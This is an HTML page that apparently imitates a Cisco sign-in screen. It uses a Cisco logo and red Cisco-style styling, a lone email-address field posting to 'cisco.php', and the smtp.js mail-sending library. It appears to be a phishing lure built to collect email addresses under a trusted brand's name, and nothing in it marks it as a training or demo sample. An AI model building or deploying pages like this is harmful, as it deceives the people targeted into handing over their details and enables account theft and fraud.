<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://smtpjs.com/v2/smtp.js">
</script>
  <style>
  body{
    font-family: Arial, Helvetica, sans-serif;
  }
  form{
    border: 3px solid #c2112f;
    width: 70%
  }
  input[type=text], input[type=password]{
    width: 100%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #c2112f;
    box-sizing: border-box;
  }
  button{
    background-color: #c2112f;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 100%;
  }
  button:hover{
    opacity: 0.8;
  }
.imgcontainer{
  text-align: center;
  margin: 24px 0 12px 0;
}
img.avatar{
  width: 40%
}
.container{
  padding: 16px;
}

span.psw{
  float: right;
  padding-top: 16px;
}
@media screen and (max-width:300px) {
  span.pswd{
    display: block;
    float: none;
  }
}
  </style>
</head>
<body>
  <link href="cisco.css" rel="stylesheet" type="text/css" />
  <form action="cisco.php" method="post" style="position: absolute; top: 100px; right:200px;">
    <div class="container" style="background-color:white;">
    <div class="imgcontainer">
      <img src="cisco-logo.png" alt="cisco" class="avatar">

    </div>
    <div class="container">
      <label for="email"><b>Email Address</b></label>
      <input type="text" placeholder="Enter Email" name="email" required>
      <button type="submit" value="Send" required>Send Email</button>
    </div>
</div>
</form>
</body>
</html>
